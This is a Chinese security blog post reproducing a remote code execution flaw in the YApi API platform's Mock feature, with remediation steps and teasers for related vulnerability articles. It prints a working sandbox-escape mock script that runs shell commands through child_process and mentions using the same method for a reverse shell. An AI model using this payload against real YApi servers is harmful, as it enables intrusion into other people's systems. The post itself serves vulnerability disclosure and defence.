YApi Mock功能远程代码执行漏洞复现

VSole2021-07-16 09:04:08

0x01 简介

YApi 是高效、易用、功能强大的 api 管理平台是国内某旅行网站的大前端技术中心开源项目,使用mock数据/脚本作为中间交互层,为前端后台开发与测试人员提供更优雅的接口管理服务,该系统被国内较多知名互联网企业所采用。

0x02 漏洞概述

近日,网络上爆出 YApi 的远程代码执行 0day 漏洞,漏洞等级为高危,且正被广泛利用。攻击者通过注册用户后,即可通过Mock功能远程执行任意代码。

因为大量用户使用YApi的默认配置并允许从外部网络访问YApi服务,导致攻击者注册用户后,即可通过 Mock功能远程执行任意代码。

0x03 影响版本

YApi7月7日前版本

0x04 环境搭建

docker部署:

https://github.com/Ryan-Miao/docker-yapi

0x05 漏洞复现

1.注册用户

2.添加项目

访问/add-project

3.添加接口

4.设置mock

const sandbox = this

const ObjectConstructor = this.constructor

const FunctionConstructor = ObjectConstructor.constructor

const myfun = FunctionConstructor('return process')

const process = myfun()

mockJson = process.mainModule.require("child_process").execSync("ifconfig").toString()

5.查看Mock地址

6.访问Mock地址

命令成功执行:


7.同理,也可利用命令反弹shell

0x06 修复方式

1、关闭YApi用户注册功能;修改完成后,重启YApi服务

在"config.json"添加"closeRegister:true"配置项:
{
  "port": "*****",
  "closeRegister":true
}

2、暂时关闭mock功能(需要修改YApi代码)

在"config.json"中添加"mock: false";

"exts/yapi-plugin-andvanced-mock/server.js"中找到

if (caseData&&caseData.case_enable{...}

在其上方添加

if(!yapi.WEBCONFIG.mock) {return false;}

3、白名单限制;

安全组配置白名单访问,或者使用NGINX进行代理,限制白名单IP访问;

4、检查用户列表,删除恶意不明用户;并删除恶意不明用户创建的接口及mock脚本。

远程代码执行漏洞mock
本作品采用《CC 协议》,转载必须注明作者和本文链接
YApi 是高效、易用、功能强大的 api 管理平台是国内某旅行网站的大前端技术中心开源项目,使用mock数据/脚本作为中间交互层,为前端后台开发与测试人员提供更优雅的接口管理服务,该系统被国内较多知名互联网企业所采用。
YApi接口管理平台远程代码执行0day漏洞,攻击者可通过平台注册用户添加接口,设置mock脚本从而执行任意代码。
Laravel官方发布安全通告,修复了一个存在于Laravel中的远程代码执行漏洞漏洞编号:CVE-2021-43503,漏洞威胁等级:严重,漏洞评分:9.8。
​云安全风险情报
2023-09-26 13:48:20
当前各行业基础设施和服务向云逐渐迁移,随之而来针对云上资产的攻击也不断出现,掌握云上风险态势成为企业安全的重要环节。腾讯安全基于云原生安全体系,通过实时监测各类针对云上资产的攻击行为,持续感知在野攻击情况。经过安全专家的分析和挖掘,漏洞是攻击链上的重要一环,既能看到“老而弥新”漏洞的自动化批量攻击,也可发现新曝光漏洞开始迅速武器化,此外还涉及一些尚未公开的潜在风险被攻击者利用。
笔者片面的从多年乙方经验(不涉及监管层面能拿到的数据)的技术层面来讨论下大攻防演练多人运动下的溯源反制思路,以及作为反制团队如何与蓝队其他成员之间进行配合反制相关的工作。 如有写的不对的地方及遗漏的地方(肯定有的),请多多交流。
鉴于该漏洞影响范围较大,建议客户尽快做好自查及防护。处置建议1、安全更新: 目前官方已发布安全更新,建议受影响客户安装更新 https://github.com/top-think/framework/releases2、自查方案: ThinkPHP 6 打开app/middleware.php 如果 \think\middleware\LoadLangPack::class 没有注释,代表着受此漏洞影响。
对此,安识科技建议广大用户及时升级到安全版本,并做好资产自查以及预防工作,以免遭受黑客攻击。GitLab 主要对 group 和 project 两个维度进行代码和文档管理。漏洞危害 攻击者可利用该漏洞通过 GitHub API 构造恶意数据执行远程代码攻击,最终获取服务器最高权限。解决方案 当前官方已发布最新版本,建议受影响的用户及时更新升级到最新版本。
鉴于该漏洞影响范围极大,建议企业尽快做好自查及防护。
近日,瑞星公司发布《2021年中国网络安全报告》,该报告综合瑞星“云安全”系
0x01 漏洞概述IBM WebSphere Application Server在今年6月发布了一则漏洞通告,cve编号为:CVE-2020-4450。该漏洞允许攻击者通过iiop向WAS进行网络请求,最终在WAS上执行任意代码。
VSole
网络安全专家